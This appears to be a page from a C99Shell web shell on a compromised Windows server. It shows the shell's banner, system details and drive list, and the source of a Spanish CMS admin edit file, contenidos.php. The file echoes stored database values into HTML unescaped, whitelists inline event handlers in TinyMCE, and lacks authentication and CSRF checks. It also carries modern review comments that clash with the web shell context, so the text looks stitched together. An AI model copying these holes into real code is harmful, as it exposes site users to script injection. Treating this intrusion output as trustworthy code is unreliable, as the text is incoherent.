!C99Shell v. 1.0 pre-release build #13!

Software: Apache. PHP/5.5.15 

uname -a: Windows NT SVR-DMZ 6.1 build 7600 (Windows Server 2008 R2 Enterprise Edition) i586 

SYSTEM 

Safe-mode: OFF (not secure)

C:\Intranet\C\xampp\htdocs\php\OAB\admin\files\   drwxrwxrwx
Free 4.09 GB of 39.52 GB (10.35%)
Detected drives: [ a ] [ c ] [ d ] [ e ] [ f ]


Viewing file:     contenidos.php (6.63 KB)      -rw-rw-rw-
<?php require_once('../../Connections/oa.php'); ?>
<?php
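/**
 * Turn a raw request value into a literal that is concatenated into a SQL statement.
 *
 * This is string-built SQL. Escaping is only a stop-gap: new code should use
 * prepared statements (PDO or mysqli) instead of this helper.
 *
 * @param mixed  $theValue           Raw value, normally taken from the request.
 * @param string $theType            "text", "date", "long", "int", "double" or "defined".
 * @param string $theDefinedValue    Returned for type "defined" when the value is non-empty.
 * @param string $theNotDefinedValue Returned for type "defined" when the value is empty.
 * @return mixed An int for "int"/"long", a quoted string for "text"/"date"/"double",
 *               the string "NULL" for an empty value, or one of the two "defined" arguments.
 */
function GetSQLValueString($theValue, $theType, $theDefinedValue = "", $theNotDefinedValue = "")
{
  // A request parameter can arrive as an array ("titulo[]=x"); it cannot be escaped
  // as text, so it is handled like an empty value instead of raising a warning.
  $theValue = is_scalar($theValue) ? (string) $theValue : "";

  // magic_quotes_gpc cannot be enabled from PHP 5.4 on, and get_magic_quotes_gpc()
  // no longer exists in PHP 8, so it is only consulted on older interpreters.
  // Quoted input is un-quoted first so that it is escaped exactly once below.
  if (version_compare(PHP_VERSION, '5.4.0', '<') && get_magic_quotes_gpc()) {
    $theValue = stripslashes($theValue);
  }

  // addslashes() ignores the connection character set, so the connection-aware
  // escape is preferred when the mysql extension is loaded. It returns false when
  // no link is open; addslashes() is then kept as a fallback.
  // NOTE(review): assumes the required connection file opened the link before the first call - confirm.
  $escaped = function_exists('mysql_real_escape_string') ? mysql_real_escape_string($theValue) : false;
  if ($escaped === false) {
    $escaped = addslashes($theValue);
  }

  $isEmpty = ($escaped === "");

  switch ($theType) {
    case "text":
    case "date":
      return $isEmpty ? "NULL" : "'" . $escaped . "'";
    case "long":
    case "int":
      // intval() discards everything after the leading digits, so the result is safe unquoted.
      return $isEmpty ? "NULL" : intval($escaped);
    case "double":
      return $isEmpty ? "NULL" : "'" . doubleval($escaped) . "'";
    case "defined":
      return $isEmpty ? $theNotDefinedValue : $theDefinedValue;
  }

  // Unknown type: the escaped value is returned WITHOUT quotes, as before.
  // Escaping does not protect an unquoted value, so callers must pass a known type.
  return $escaped;
}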

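// Build the URL the edit form posts back to: this script plus the current query string.
// $HTTP_SERVER_VARS is not populated from PHP 5.4 on, so the superglobals are read instead.
// SCRIPT_NAME is used rather than PHP_SELF because PHP_SELF also carries any
// client-supplied path info, and the value is written into the form's action attribute.
$editFormAction = isset($_SERVER['SCRIPT_NAME']) ? $_SERVER['SCRIPT_NAME'] : "";

// The query string is re-encoded from the parsed parameters, so quotes and angle
// brackets sent by the client cannot reach the page unencoded.
$editFormQuery = http_build_query($_GET);
if ($editFormQuery !== "") {
  $editFormAction .= "?" . $editFormQuery;
}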

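// Handle the edit form: update one row of "contenidos", then redirect to the list page.
// $HTTP_POST_VARS / $HTTP_SERVER_VARS are not populated from PHP 5.4 on, so the
// superglobals are read instead.
// NOTE(review): no login check and no anti-CSRF token are visible in this file - confirm
// that the required connection file or the web server enforces access to this admin page.
if (isset($_POST["MM_update"]) && $_POST["MM_update"] === "form1") {
  // A missing field becomes "", which GetSQLValueString() turns into NULL.
  $campos = array();
  foreach (array('idcat', 'orden', 'tema', 'titulo', 'textoinicial', 'textocompleto', 'enlace', 'imagen', 'idcontenido') as $nombre) {
    $campos[$nombre] = isset($_POST[$nombre]) ? $_POST[$nombre] : "";
  }

  // The statement is still built by string formatting; every value goes through
  // GetSQLValueString() with the type that matches its column.
  $updateSQL = sprintf("UPDATE contenidos SET idcat=%s, orden=%s, tema=%s, titulo=%s, textoinicial=%s, textocompleto=%s, enlace=%s, imagen=%s WHERE idcontenido=%s",
                       GetSQLValueString($campos['idcat'], "int"),
                       GetSQLValueString($campos['orden'], "int"),
                       GetSQLValueString($campos['tema'], "int"),
                       GetSQLValueString($campos['titulo'], "text"),
                       GetSQLValueString($campos['textoinicial'], "text"),
                       GetSQLValueString($campos['textocompleto'], "text"),
                       GetSQLValueString($campos['enlace'], "text"),
                       GetSQLValueString($campos['imagen'], "text"),
                       GetSQLValueString($campos['idcontenido'], "int"));

  mysql_select_db($database_oa, $oa);
  $Result1 = mysql_query($updateSQL, $oa);
  if ($Result1 === false) {
    // The driver message goes to the server log only; showing it to the client
    // exposes table and column names.
    error_log("contenidos.php: UPDATE failed: " . mysql_error($oa));
    die("Database error.");
  }

  $updateGoTo = "../edit_contenidos.php";
  if (isset($_SERVER['QUERY_STRING']) && $_SERVER['QUERY_STRING'] !== "") {
    $updateGoTo .= (strpos($updateGoTo, '?') !== false) ? "&" : "?";
    $updateGoTo .= $_SERVER['QUERY_STRING'];
  }
  header(sprintf("Location: %s", $updateGoTo));
  // Stop here: without exit the rest of the page still runs and is sent after the redirect header.
  exit;
}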

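// Load the row to edit. The id is used unquoted in the WHERE clause, where addslashes()
// gives no protection, so it is forced to an integer instead.
// $cont used to be created by register_globals; where that no longer happens the
// value is read from the query string.
// NOTE(review): assumes the id arrives as ?cont=N on the URL - confirm against the linking page.
$cont_rsCont = 0;
if (isset($cont)) {
  $cont_rsCont = intval($cont);
} elseif (isset($_GET['cont'])) {
  $cont_rsCont = intval($_GET['cont']);
}

mysql_select_db($database_oa, $oa);
$query_rsCont = sprintf("SELECT * FROM contenidos where idcontenido=%d ORDER BY titulo", $cont_rsCont);
$rsCont = mysql_query($query_rsCont, $oa);
if ($rsCont === false) {
  // The driver message goes to the server log only, never to the client.
  error_log("contenidos.php: SELECT failed: " . mysql_error($oa));
  die("Database error.");
}
// mysql_fetch_assoc() returns false when no row matches; the form then renders with empty fields.
$row_rsCont = mysql_fetch_assoc($rsCont);
$totalRows_rsCont = mysql_num_rows($rsCont);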
?>
<html>
<head>
<title>Documento sin t&iacute;tulo</title>
<!-- tinyMCE -->
<script language="javascript" type="text/javascript" src="/tinymce/jscripts/tiny_mce/tiny_mce.js"></script>
<script language="javascript" type="text/javascript">
// Configure the TinyMCE rich-text editor for this page. With mode "textareas"
// the editor is attached to every <textarea> in the document.
tinyMCE.init({
    theme : "advanced",
    language : "es",
    theme_advanced_resizing : true,
    // Toolbar buttons that are hidden, including the HTML source ("code") and "cleanup" buttons.
    theme_advanced_disable : "cleanup,code,help,styleselect,cut,copy,paste",
    mode : "textareas",
    plugins : "table,advhr,advimage,emotions,iespell,insertdatetime,preview,flash,searchreplace,print,contextmenu,iwimg",
    theme_advanced_buttons1_add_before : "save,separator",
    theme_advanced_buttons1_add : "fontselect,fontsizeselect, iwimg",
    theme_advanced_buttons2_add : "separator,insertdate,inserttime,preview,zoom,separator,forecolor,backcolor",
    // NOTE(review): this key is defined again at the end of the object; the later
    // definition wins, so this button list is never applied.
    theme_advanced_buttons3_add : "emotions,iespell,flash,advhr,separator,print",
    theme_advanced_buttons2_add_before: "cut,copy,paste,separator,search,replace,separator",
    theme_advanced_buttons3_add_before : "tablecontrols,separator",
    theme_advanced_toolbar_location : "top",
    theme_advanced_toolbar_align : "center",
    theme_advanced_path_location : "bottom",
    plugin_insertdate_dateFormat : "%Y-%m-%d",
    plugin_insertdate_timeFormat : "%H:%M:%S",
    // Allows the inline event-handler attributes onclick, onmouseover and onmouseout
    // on <a> and <img>, so script-bearing markup is kept in the submitted HTML.
    // Editor-side filtering is not a security control in any case: the stored HTML
    // has to be sanitised on the server before it is shown to other users.
    extended_valid_elements : "a[name|href|target|title|onclick],img[class|src|border=0|alt|title|hspace|vspace|width|height|align|onmouseover|onmouseout|name],hr[class|width|size|noshade],font[face|size|color|style],span[class|align|style]",
    // NOTE(review): these list URLs are relative and point at the TinyMCE example
    // files, while the editor script itself is loaded from "/tinymce/..." - confirm they resolve.
    external_link_list_url : "tinymce/example/example_link_list.js",
    external_image_list_url : "tinymce/example/example_image_list.js",
    flash_external_list_url : "tinymce/example/example_flash_list.js",
relative_urls : false,
remove_script_host : true,
// Hard-coded site origin used as the base for URLs in edited content.
document_base_url : "http://observatorio.dama.gov.co/",
    // Second definition of theme_advanced_buttons3_add; this is the one that takes effect.
    theme_advanced_buttons3_add : "pastetext,pasteword,selectall"
});
/**
 * Placeholder hook for content pasted from Word.
 *
 * @param {string} type    "before" or "after", i.e. which side of the editor's
 *                         built-in cleanup the call is made on.
 * @param {string} content The pasted markup.
 * @returns {string} The content lower-cased for either phase; unchanged for any other type.
 */
function convertWord(type, content) {
    // Both phases run the same dummy transformation.
    var isKnownPhase = (type === "before" || type === "after");
    if (isKnownPhase) {
        return content.toLowerCase();
    }

    return content;
}

</script>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
</head>

<body>
<table width="600" border="1" align="center" cellpadding="0" cellspacing="0">
  <tr>
    <td>&nbsp;</td>
  </tr>
  <tr>
    <td><form name="form1" method="POST" action="<?php echo $editFormAction?>">
        <p> 
          <input name="idcontenido" type="hidden" id="idcontenido" value="<?php echo $row_rsCont['idcontenido']; ?>">
          <input name="idcat" type="hidden" id="idcat" value="<?php echo $row_rsCont['idcat']; ?>">
          <input name="orden" type="hidden" id="orden" value="<?php echo $row_rsCont['orden']; ?>">
          <input name="enlace" type="hidden" id="enlace" value="<?php echo $row_rsCont['enlace']; ?>">
          <input name="imagen" type="hidden" id="imagen" value="<?php echo $row_rsCont['imagen']; ?>">
        </p>
        <p> 
          <input name="tema" type="text" id="tema" value="<?php echo $row_rsCont['tema']; ?>">
        </p>
        <p> 
          <textarea name="titulo" cols="100" rows="8" id="titulo"><?php echo $row_rsCont['titulo']; ?></textarea>
        </p>
        <p> 
          <textarea name="textoinicial" cols="100" rows="15" id="textoinicial"><?php echo $row_rsCont['textoinicial']; ?></textarea>
        </p>
        <p> 
          <textarea name="textocompleto" cols="100" rows="15" id="textocompleto"><?php echo $row_rsCont['textocompleto']; ?></textarea>
          <br>
          <input type="submit" name="Submit" value="Enviar">
        </p>
        <input type="hidden" name="MM_update" value="form1">
      </form></td>
  </tr>
  <tr>
    <td>&nbsp;</td>
  </tr>
</table>
</body>
</html>
<?php
// Release the result set of the row lookup once the page has been rendered.
mysql_free_result($rsCont);
?>

